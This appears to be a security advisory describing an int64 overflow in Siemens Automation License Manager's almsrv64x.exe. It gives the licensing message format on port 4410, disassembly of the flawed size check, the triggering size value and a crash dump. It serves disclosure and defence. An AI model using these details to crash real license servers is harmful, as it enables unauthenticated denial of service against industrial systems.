An int64 overflow vulnerability exists in Siemens Automation License Manager (ALM) almsrv64x.exe v602.1.0.1. An unauthenticated remote attacker can exploit it to crash the process.
almsrv64x.exe listens on TCP port 4410 by default and processes licensing messages having the following format:
// be = big endian
struct order_msg
{
header hdr;
body bd;
};
struct header
{
be32 OrderCode; // order command code
be32 OrderSize; // size of order (msg) data
};
struct body
{
byte size[]; // data size encoded in variable number of bytes
// size range encoded as
// 0 - 0xfe b1
// 0xff - 0xfffe ff b1 b2
// 0xffff - 0xfffffffe ff ff ff b1 b2 b3 b3
// 0xffffffff - 0xffffffffffffffff ff ff ff ff ff ff ff b1 b2 b3 b4 b5 b6 b7 b8
byte data[size]; // XML data
};
almsrv64x.exe has a function to check if the body size is within the allocated buffer. If so, the function returns normally. Otherwise, an exception is thrown:
[...]
.text:00007FF7F6D83ED0 sub rsp, 48h
.text:00007FF7F6D83ED4 rdx = size
.text:00007FF7F6D83ED4 add rdx, [rcx+CSocketStream.pos] ; VULN: rdx = 0xffffffffffffffff ->
.text:00007FF7F6D83ED4 ; int64 overflow
.text:00007FF7F6D83ED8 cmp rdx, [rcx+CSocketStream.AllocSize]
.text:00007FF7F6D83EDC ja short loc_7FF7F6D83EE3
.text:00007FF7F6D83EDE add rsp, 48h
.text:00007FF7F6D83EE2 retn
.text:00007FF7F6D83EE3 ; ---------------------------------------------------------------------------
.text:00007FF7F6D83EE3
.text:00007FF7F6D83EE3 loc_7FF7F6D83EE3: ; CODE XREF: CSocketStream_EnsureNbytesInBuf+C↑j
.text:00007FF7F6D83EE3 lea rdx, aCmemstreamTrie_0 ; "CMemStream - tried to read behind buffe"...
.text:00007FF7F6D83EEA lea rcx, [rsp+48h+pExceptionObject]
.text:00007FF7F6D83EEF call sub_7FF7F6D52F90
.text:00007FF7F6D83EF4 lea rdx, __TI3?AVout_of_range@std@@ ; pThrowInfo
.text:00007FF7F6D83EFB lea rcx, [rsp+48h+pExceptionObject] ; pExceptionObject
.text:00007FF7F6D83F00 call _CxxThrowException
[...]
If the attacker specifies a body size of 0xffffffffffffffff, it would cause an int64 overflow in the check function and bypass the check in the function. This would trick an XML processing function into thinking that the XML data is 0xffffffffffffffff bytes, which can result in a memory read access violation, terminating the almsrv64x.exe process:
(318.19f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rax=00000000fffffff7 rbx=ffffffffffffffff rcx=00007ff7f6d86f5e
rdx=0000000000000005 rsi=0000000000000000 rdi=000001e0e04e306f
rip=00007ff7f6d86e04 rsp=000000d9dc7fccd0 rbp=00000000ffffffff
r8=0000000002488f91 r9=0000000002488f91 r10=0000000000000000
r11=000000d9dc7fcb60 r12=00007ff7f6b80000 r13=0000000000000005
r14=000000d9dc7fdc68 r15=0000000000000002
iopl=0 nv up ei pl nz ac pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010213
almsrv64x+0x206e04:
00007ff7`f6d86e04 410fbe0438 movsx eax,byte ptr [r8+rdi] ds:000001e0`e296c000=??
[...]